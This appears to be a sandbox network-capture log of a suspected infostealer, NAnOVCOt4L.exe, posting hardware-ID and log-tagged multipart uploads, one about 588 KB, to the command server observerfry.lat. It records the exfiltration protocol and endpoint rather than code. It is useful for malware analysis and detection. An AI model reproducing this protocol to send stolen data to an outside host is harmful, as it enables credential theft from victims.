2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 7a 6a 4d 53 57 37 7a 7a 38 77 69 49 6b 75 58 49 74 52 70 78 43 75 31 30 69 50 36 71 50 4a 67 65 6c 44 42 39 73 4c 57 4f 34 34 2b 44 4e 43 4d 6c 35 63 65 38 44 4d 61 6d 71 34 2b 39 54 44 49 47 30 48 53 63 36 70 4d 55 6f 6c 2b 36 46 46 32 4e 38 59 54 45 32 6f 39 41 4b 33 57 73 39 66 46 49 78 74 65 6c 79 65 56 55 4f 67 69 6c 63 34 4f 6b 7a 46 4c 68 53 63 64 6b 4d 4f 66 68 74 34 33 57 6a 57 4a 73 50 65 2b 77 76 46 62 47 77 61 57 49 70 68 35 34 51 4f 5a 68 6b 61 4f 71 50 4a 51 63 6c 54 5a 78 70 36 53 6e 2f 66 48 59 64 79 4a 72 75 75 6a 74 42 4d 6a 5a 36 6f 2f 39 4e 53 6f 4f 70 55 6a 63 70 49 78 43 36 31 4b 6e 4e 47 6d 35 74 4c 37 53 67 75 70 36 4b 32 53 72 37 75 74 4c 78 74 65 6c 79 65 56 55 4f 41 69 6c 63 34 4f 6b 7a 46 4c 68 53 63 64 6b 4d 4f 66 68 74 34 33 Data Ascii: zjMSW7zz8wiIkuXItRpxCu10iP6qPJgelDB9sLWO44+DNCMl5ce8DMamq4+9TDIG0HSc6pMUol+6FF2N8YTE2o9AK3Ws9fFIxtelyeVUOgilc4OkzFLhScdkMOfht43WjWJsPe+wvFbGwaWIph54QOZhkaOqPJQclTZxp6Sn/fHYdyJruujtBMjZ6o/9NSoOpUjcpIxC61KnNGm5tL7Sgup6K2Sr7utLxtelyeVUOAilc4OkzFLhScdkMOfht43
2024-12-23 16:30:03 UTC	1369	IN	Data Raw: 6b 53 33 37 76 46 4c 67 64 76 46 79 4c 4d 50 4b 67 69 6c 65 39 4b 38 31 41 4f 35 41 70 38 34 59 50 75 30 73 73 53 50 67 7a 51 69 4a 65 57 2b 2f 55 36 57 6c 4f 72 49 36 51 70 6b 53 4b 56 6f 33 50 33 55 46 50 4e 4b 77 58 6b 6e 70 66 50 77 67 34 6a 4f 5a 6a 35 6a 76 75 6a 2f 41 37 69 6e 79 4e 32 69 48 47 6b 45 31 48 71 57 38 6f 45 42 6f 78 57 73 43 55 71 6c 74 4c 6a 41 6a 66 78 69 4c 32 57 7a 2b 62 77 4b 78 6f 47 6c 6c 2b 55 68 65 45 48 31 64 4e 4b 71 31 41 37 7a 53 74 49 36 64 62 43 6a 71 34 2f 49 31 33 4e 73 65 76 50 6e 76 46 4c 47 77 62 61 42 35 52 34 71 48 71 55 77 6e 4f 6d 56 41 62 30 52 67 43 56 68 74 4b 57 72 68 50 48 7a 57 54 35 69 72 66 32 2b 64 59 75 64 38 39 71 6d 48 47 31 34 32 31 71 41 34 34 51 42 38 54 36 56 4f 6d 75 4a 6a 5a 2f 53 79 4e 30 32 Data Ascii: kS37vFLgdvFyLMPKgile9K81AO5Ap84YPu0ssSPgzQiJeW+/U6WlOrI6QpkSKVo3P3UFPNKwXknpfPwg4jOZj5jvuj/A7inyN2iHGkE1HqW8oEBoxWsCUqltLjAjfxiL2Wz+bwKxoGll+UheEH1dNKq1A7zStI6dbCjq4/I13NsevPnvFLGwbaB5R4qHqUwnOmVAb0RgCVhtKWrhPHzWT5irf2+dYud89qmHG1421qA44QB8T6VOmuJjZ/SyN02

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:05 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Q8A7M9HT8VACM2BVC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18163 Host: observerfry.lat
2024-12-23 16:30:05 UTC	15331	OUT	Data Raw: 2d 2d 51 38 41 37 4d 39 48 54 38 56 41 43 4d 32 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 32 44 38 39 42 35 35 31 32 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 38 41 37 4d 39 48 54 38 56 41 43 4d 32 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 38 41 37 4d 39 48 54 38 56 41 43 4d 32 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --Q8A7M9HT8VACM2BVCContent-Disposition: form-data; name="hwid"0C43B2D89B55125EAC8923850305D13E--Q8A7M9HT8VACM2BVCContent-Disposition: form-data; name="pid"2--Q8A7M9HT8VACM2BVCContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-23 16:30:05 UTC	2832	OUT	Data Raw: 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
2024-12-23 16:30:06 UTC	1140	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cs39g82k939tis5botbgb891hb; expires=Fri, 18 Apr 2025 10:16:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBGyTYwl0QV%2F%2FzFb2nCbeue7%2B7%2B%2B0c4hNoLbfAt7Aa5sVxJchCSOrdYQiNeO2%2B%2F2dJdDDusHJtEJVvjXQTHl2LLNQtwOTuYL%2F3i0LuAUX9wnhYLSROI2FQF9N%2BTlqxATYnM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bbf51caa8cee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1835&rtt_var=706&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19123&delivery_rate=1532004&cwnd=252&unsent_bytes=0&cid=a1d668e638522c8d&ts=1451&x=0"
2024-12-23 16:30:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:30:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:08 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1O2WZCWELESOAQNOSB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8790 Host: observerfry.lat
2024-12-23 16:30:08 UTC	8790	OUT	Data Raw: 2d 2d 31 4f 32 57 5a 43 57 45 4c 45 53 4f 41 51 4e 4f 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 32 44 38 39 42 35 35 31 32 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 4f 32 57 5a 43 57 45 4c 45 53 4f 41 51 4e 4f 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4f 32 57 5a 43 57 45 4c 45 53 4f 41 51 4e 4f 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --1O2WZCWELESOAQNOSBContent-Disposition: form-data; name="hwid"0C43B2D89B55125EAC8923850305D13E--1O2WZCWELESOAQNOSBContent-Disposition: form-data; name="pid"2--1O2WZCWELESOAQNOSBContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-23 16:30:09 UTC	1124	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tstp90o2n2ibhbgu33aki93u06; expires=Fri, 18 Apr 2025 10:16:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnhGKqRYPWKWPlj2YN8jn%2BnXNBjHM5PGmXqXWWmWTVgGZYEYg2ZAgZeok2wfhlsdzfVJ0sNzrdoS8O5huVtuMqvCIYZnTifOKSFbao%2BipkAZXVCpXO1Hm3Iu37dyyZvXUMI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bc06befe7271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1831&rtt_var=703&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2835&recv_bytes=9728&delivery_rate=1537651&cwnd=225&unsent_bytes=0&cid=1a78b792588dbc8b&ts=1309&x=0"
2024-12-23 16:30:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:30:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:11 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5J1M98U4MYK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20401 Host: observerfry.lat
2024-12-23 16:30:11 UTC	15331	OUT	Data Raw: 2d 2d 35 4a 31 4d 39 38 55 34 4d 59 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 32 44 38 39 42 35 35 31 32 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 4a 31 4d 39 38 55 34 4d 59 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 4a 31 4d 39 38 55 34 4d 59 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 4a 31 4d 39 38 55 34 4d 59 4b Data Ascii: --5J1M98U4MYKContent-Disposition: form-data; name="hwid"0C43B2D89B55125EAC8923850305D13E--5J1M98U4MYKContent-Disposition: form-data; name="pid"3--5J1M98U4MYKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5J1M98U4MYK
2024-12-23 16:30:11 UTC	5070	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-23 16:30:12 UTC	1130	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t14q5v9imnhig739ktr6bmr0kl; expires=Fri, 18 Apr 2025 10:16:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65895qN5zDOT5Xbe%2BYip1ZtPxmoiE%2B9PqL3PI2SeXBZ0LnC4ZQMJw%2BkC3E%2F4mLO2S4KxHEuV4HCTbttKdODYLDWT3GuECEArcG5DHVtQw9VXNQrmgHrj88j4eDsEq75vYk8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bc18bc6c41d8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1691&rtt_var=643&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21355&delivery_rate=1690793&cwnd=218&unsent_bytes=0&cid=ce09fecd7d733961&ts=1047&x=0"
2024-12-23 16:30:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:30:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:13 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W2O9E9SV6Z10L1QQ14Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1277 Host: observerfry.lat
2024-12-23 16:30:13 UTC	1277	OUT	Data Raw: 2d 2d 57 32 4f 39 45 39 53 56 36 5a 31 30 4c 31 51 51 31 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 32 44 38 39 42 35 35 31 32 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 32 4f 39 45 39 53 56 36 5a 31 30 4c 31 51 51 31 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 32 4f 39 45 39 53 56 36 5a 31 30 4c 31 51 51 31 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --W2O9E9SV6Z10L1QQ14QContent-Disposition: form-data; name="hwid"0C43B2D89B55125EAC8923850305D13E--W2O9E9SV6Z10L1QQ14QContent-Disposition: form-data; name="pid"1--W2O9E9SV6Z10L1QQ14QContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-23 16:30:14 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:30:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7gd8us6tet56tdeko5bp411mb4; expires=Fri, 18 Apr 2025 10:16:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DvrrW559ajp203yPRUfsdIwVBkoET%2Bz%2Bj1ZM4VqS8hB%2BzbFCg5cpu2M6UY2%2FqvLR%2Bjw75eZeW3XJnfMPK50yPjqLi95%2FkJy4mxMdpN1tzvFiongg3Qcc7dHMxr4R83miYNE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69bc2a1876c427-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1549&rtt_var=672&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2194&delivery_rate=1885087&cwnd=32&unsent_bytes=0&cid=40c52f9f462b71e7&ts=791&x=0"
2024-12-23 16:30:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:30:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	172.67.199.72	443	7008	C:\Users\user\Desktop\NAnOVCOt4L.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:30:16 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W2NW3P8BHSQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587732 Host: observerfry.lat
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: 2d 2d 57 32 4e 57 33 50 38 42 48 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 32 44 38 39 42 35 35 31 32 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 32 4e 57 33 50 38 42 48 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 32 4e 57 33 50 38 42 48 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 32 4e 57 33 50 38 42 48 53 51 Data Ascii: --W2NW3P8BHSQContent-Disposition: form-data; name="hwid"0C43B2D89B55125EAC8923850305D13E--W2NW3P8BHSQContent-Disposition: form-data; name="pid"1--W2NW3P8BHSQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--W2NW3P8BHSQ
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c 92 b3 86 c8 23 75 35 5f 13 bf 72 47 8c 5d df f5 93 78 e7 df 27 68 f0 c4 a2 b6 3e 08 26 9d 66 62 c8 Data Ascii: ivhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i5.=4-?^ =0,#u5_rG]x'h>&fb
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb 9c df aa 0d 7a a5 42 a5 17 2f 64 bb 2a 56 5f 9d 3b cc 34 ae ad e6 95 e9 b8 86 32 2d e1 e9 22 39 21 Data Ascii: z!}2R~:,CfwekfDOsLRb1@g=i<74S_5[i#b\|{EW_\|OOH?);El~VsIiC4xb}^pi5vXDS3e_E3N3CiVl8~01zB/d*V_;42-"9!
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45 5d 55 51 6f fe 2e 00 62 70 73 18 71 93 2a 9f e8 1d 7a dc 93 5b 40 13 b0 97 0b 7c 39 82 79 81 3c ba Data Ascii: %?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa \|7r6;!_$E]UQo.bpsq*z[@\|9y<
2024-12-23 16:30:16 UTC	15331	OUT	Data Raw: 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb c3 8f 5e 38 01 aa b9 46 2f f2 dd 83 ee 7a 4a 3c 39 1c 86 0c 13 c5 b9 fe 59 fb 6a 3d 20 5c 80 b5 1d Data Ascii: /.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn\|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F^8F/zJ<9Yj= \
